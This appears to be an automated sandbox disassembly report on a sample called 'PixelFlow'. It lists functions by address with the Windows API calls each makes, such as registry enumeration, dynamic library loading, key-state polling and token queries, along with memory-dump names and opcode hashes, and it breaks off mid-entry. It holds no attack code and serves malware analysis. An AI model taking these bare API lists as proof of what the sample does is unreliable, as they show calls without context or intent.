Function 0068045F Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

Part of subcall function 00681242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006801D5,?,?), ref: 00681259

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680525
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00680564
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 006805AB
RegCloseKey.ADVAPI32(?,?), ref: 006805D7
RegCloseKey.ADVAPI32(00000000), ref: 006805E4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 1fdb4c8db2cb36aefcb7527f1b007b9658b51ac8a0457ccaad5df89f03a11223
Instruction ID: e45eb38970cb75c8d870ff970d382b63d1a8553373f1caa15e1214e689a72929
Opcode Fuzzy Hash: 1fdb4c8db2cb36aefcb7527f1b007b9658b51ac8a0457ccaad5df89f03a11223
Instruction Fuzzy Hash: 52517C71208204AFD794EF54C981EABB7EAFF85304F044A1DF5958B2A1DB30E949CB66

Function 0067DD79 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00604D37: __itow.LIBCMT ref: 00604D62
Part of subcall function 00604D37: __swprintf.LIBCMT ref: 00604DAC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0067DDD8
GetProcAddress.KERNEL32(00000000,?), ref: 0067DE5B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0067DE77
GetProcAddress.KERNEL32(00000000,?), ref: 0067DEB8
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0067DED2

Part of subcall function 0061402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667CBE,?,?,00000000), ref: 00614041
Part of subcall function 0061402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667CBE,?,?,00000000,?,?), ref: 00614065

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 914f4550339efb4a8195647c4d0991984ae582a9b6b341db3456c403ad33a5f6
Instruction ID: df6ead9ee8248ebff59a0c8a56660fea83a28935b527a280cdfcdadb520f83de
Opcode Fuzzy Hash: 914f4550339efb4a8195647c4d0991984ae582a9b6b341db3456c403ad33a5f6
Instruction Fuzzy Hash: 64514675A002059FDB11EFA8C4848AEB7F6FF18310B14C459E90AAB361DB31AD85CF94

Function 0066EA21 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0066EACF
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0066EAF8
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0066EB37

Part of subcall function 00604D37: __itow.LIBCMT ref: 00604D62
Part of subcall function 00604D37: __swprintf.LIBCMT ref: 00604DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0066EB5C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0066EB64

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: b438dc74792831873362380a97050b72adb87043f2a4d0750dd5471564215158
Instruction ID: b2e3e10284b0b6ed41b706a87c2f4c7f1a3c2ff73ec4b47bd23c5b00e941404c
Opcode Fuzzy Hash: b438dc74792831873362380a97050b72adb87043f2a4d0750dd5471564215158
Instruction Fuzzy Hash: 7E516D75A00505DFDB55EF64C981AAEBBF6EF08310B148099E909AB3A2CB31ED11CF54

Function 0068A443 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aaff2800b761b0aab2e4e9c1275dadc23f22124fadc8fdab23691e0e5ec6ec0
Instruction ID: 91d6878a1f7195a4f2997344ea77c93340a0f180b72b9c99bc2f31fde3d4f692
Opcode Fuzzy Hash: 0aaff2800b761b0aab2e4e9c1275dadc23f22124fadc8fdab23691e0e5ec6ec0
Instruction Fuzzy Hash: E441D675900104AFEB10EFA8CC48FE9BBAAEB09310F141256FD15A73D1D7B0AD91DB52

Function 00602714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00602727
ScreenToClient.USER32(006C67B0,?), ref: 00602744
GetAsyncKeyState.USER32(00000001), ref: 00602769
GetAsyncKeyState.USER32(00000002), ref: 00602777

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 1d96620c45fad5e39bd45f155316a6d5d1ba725d5cb9deb831f891afba68b088
Instruction ID: d3987b9ed7412b56e0b5813bd3e15f2cc52fef93dc36437dc83859d5ac8ab54a
Opcode Fuzzy Hash: 1d96620c45fad5e39bd45f155316a6d5d1ba725d5cb9deb831f891afba68b088
Instruction Fuzzy Hash: 4F41517550411AFFDF199FA4C848AEABB76FF45330F10435AF824A22D0C730AAA0DB91

Function 006593BA Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 006593CB
PostMessageW.USER32(?,00000201,00000001), ref: 00659475
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0065947D
PostMessageW.USER32(?,00000202,00000000), ref: 0065948B
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00659493

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 319e2fdd175107181e8728730a4a55f80961735689ccfdfce6e13f5004df9c49
Instruction ID: 6bcbb7163234ab10438e39d0d91e2b87759cdfb8906ab9e2dcf811ade33313b5
Opcode Fuzzy Hash: 319e2fdd175107181e8728730a4a55f80961735689ccfdfce6e13f5004df9c49
Instruction Fuzzy Hash: F131C071500219EFEF14CFA8D94CADE3BBAEB44316F104229FD25A62D0C3B09D19DBA0

Function 0065BB68 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0065BB80
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0065BB9D
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0065BBD5
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0065BBFB
_wcsstr.LIBCMT ref: 0065BC05

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: e5144586969660598f5e5fef14278e6c67bd6785c1a003cc66ac218d3b25a394
Instruction ID: 8d56e7a27ea3dffc727a7803a3bfa4e4c28a6fcf3b846c4e4f61d6a0783af25b
Opcode Fuzzy Hash: e5144586969660598f5e5fef14278e6c67bd6785c1a003cc66ac218d3b25a394
Instruction Fuzzy Hash: D22134322042047FFB245B29AC09ABBBBAEDF45721F00502EFC04CA291EFA1CC4196A4

Function 0068B538 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 006029E2: GetWindowLongW.USER32(?,000000EB), ref: 006029F3

GetWindowLongW.USER32(?,000000F0), ref: 0068B57F
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0068B5A4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0068B5BC
GetSystemMetrics.USER32(00000004), ref: 0068B5E5
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00671340,00000000), ref: 0068B603

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: f37b85d0efdc10761d4c5835ec4a550e71dc24b705cd5d3fdcea512ef11b6594
Instruction ID: 0008f1d80f65d50c289ed1b5ac16d219d4f0c9da337f664bde3b99b376e3be45
Opcode Fuzzy Hash: f37b85d0efdc10761d4c5835ec4a550e71dc24b705cd5d3fdcea512ef11b6594
Instruction Fuzzy Hash: 04219F71910615AFCB10AF39CC08AAA3BA7FB05721F116729F932D22E0E7308951CB90

Function 00659CA2 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00659CBB

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00659CED
__itow.LIBCMT ref: 00659D05
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00659D2D
__itow.LIBCMT ref: 00659D3E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 1579d00aa59a73c2ad105954c0946e37f7c2bc8fee6035e7d88bca9c69b379d8
Instruction ID: 56fb3db944f9a6d36962f7fa22e223708c4cf752c5db309303ae23b8e781569c
Opcode Fuzzy Hash: 1579d00aa59a73c2ad105954c0946e37f7c2bc8fee6035e7d88bca9c69b379d8
Instruction Fuzzy Hash: EA21C831700214BFDB609B64DC85EEE7BAEEF45751F045019FE00DB241D6708945D7A1

Function 006016CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00601729
SelectObject.GDI32(?,00000000), ref: 00601738
BeginPath.GDI32(?), ref: 0060174F
SelectObject.GDI32(?,00000000), ref: 00601778

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: b86a184c434df701c9c71a747509ade5c00017f5ed929e48b473efc0a5ac271c
Instruction ID: d73d6884558b600a65256f35f2a9075bcd99921f511a174368f519e513bc8c48
Opcode Fuzzy Hash: b86a184c434df701c9c71a747509ade5c00017f5ed929e48b473efc0a5ac271c
Instruction Fuzzy Hash: C3217F70951308EFDB119F64DD44BBA7BBBFB01321F14521AF8109A2E0D7B19891CBA4

Function 0065C61A Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0065C62F
_memcmp.LIBCMT ref: 0065C64D
_memcmp.LIBCMT ref: 0065C660
_memcmp.LIBCMT ref: 0065C678
_memcmp.LIBCMT ref: 0065C690

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 8fc7e3c013c007c9bb74c5cb7a3b486d7772da8456308a16a60c936fe2422be3
Instruction ID: 234b1647c74adbfa0758c7eb1dcd2d7212915bcc5757d8b5d66c2ac5c12644c3
Opcode Fuzzy Hash: 8fc7e3c013c007c9bb74c5cb7a3b486d7772da8456308a16a60c936fe2422be3
Instruction Fuzzy Hash: 270145A1A04724BFD6006211AC82FAB734F9AA53A1F004067FD05EB341E620DF1982A8

Function 00664EBB Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00664EE2
__beginthreadex.LIBCMT ref: 00664F00
MessageBoxW.USER32(?,?,?,?), ref: 00664F15
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00664F2B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00664F32

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 660736a50c58803120f094f4b9876761b1f36f40d1b2cd78de89d80350f2e53e
Instruction ID: e6da5ddfff7456432eb01d3bef9477b1ab69ad9055c4de79692c3fdb8917d7ef
Opcode Fuzzy Hash: 660736a50c58803120f094f4b9876761b1f36f40d1b2cd78de89d80350f2e53e
Instruction Fuzzy Hash: 1211DBB6904354BFD7019FA8DC04EEE7FAEEB85320F144256F815D3391DA798E0487A1

Function 00658C03 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00658C1F
GetLastError.KERNEL32(?,006586E3,?,?,?), ref: 00658C29
GetProcessHeap.KERNEL32(00000008,?,?,006586E3,?,?,?), ref: 00658C38
HeapAlloc.KERNEL32(00000000,?,006586E3,?,?,?), ref: 00658C3F
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00658C56

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 5ff4bd1f567ff3b0f7790dce6fd7697745ddc46144b14bcce2f05db209a26e54
Instruction ID: 41d29f2bc6f93619134ca6514756a303e6330333c96fc421c9605c46db446498
Opcode Fuzzy Hash: 5ff4bd1f567ff3b0f7790dce6fd7697745ddc46144b14bcce2f05db209a26e54
Instruction Fuzzy Hash: C3011271601204BFEB114FBADD88DAB7BAEEF89755B10056AFC45D3620DB319D14CA70

Function 0066566C Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00665688
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00665696
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0066569E
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006656A8
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006656E4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: a572f549dfc4d9bfb5bf446ee3c17b130d30816afdc58119cf565ae155ee6975
Instruction ID: a148f5029dfdf81d47af9057341717ba3e5640609e72a6bbf5711e09fb79d43f
Opcode Fuzzy Hash: a572f549dfc4d9bfb5bf446ee3c17b130d30816afdc58119cf565ae155ee6975
Instruction Fuzzy Hash: 0A012931D06A29DBDF00AFE4DC4A9EEBBBAFF08711F401456E902F2260CB309550CBA5

Function 00657B0B Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657A45,80070057,?,?,?,00657E56), ref: 00657B28
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657A45,80070057,?,?), ref: 00657B43
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657A45,80070057,?,?), ref: 00657B51
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657A45,80070057,?), ref: 00657B61
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00657A45,80070057,?,?), ref: 00657B6D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: cf02fbff2c598645c79af88d593a50d0449f5b5be8c5ace7504c4d20bfdad0cb
Instruction ID: 4e0e070867634d8d537f62f09bb89a8a8efe4d06c72d0d41b659aedeebeede9f
Opcode Fuzzy Hash: cf02fbff2c598645c79af88d593a50d0449f5b5be8c5ace7504c4d20bfdad0cb
Instruction Fuzzy Hash: 7F017C72601205BFEB114F65ED48AAA7BAEEF48752F101029FD08D6210E731DE04CBE0

Function 00658AAA Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00658AC1
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00658ACB
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00658ADA
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00658AE1
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00658AF7

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 15ff24253745c59a8f9a1c28b10232b2fd9508372bba418bd3c312a072e62760
Instruction ID: c30e7306f42dcd02082a793c716d8fcd7992e360c4fe53331e530bc933c66196
Opcode Fuzzy Hash: 15ff24253745c59a8f9a1c28b10232b2fd9508372bba418bd3c312a072e62760
Instruction Fuzzy Hash: ADF0CD71200204AFEB100FA4DC8DEAB3BAEEF89769F00012AF904D3660CB71DC44DB60

Function 00658B0B Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00658B22
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00658B2C
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00658B3B
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00658B42
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00658B58

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
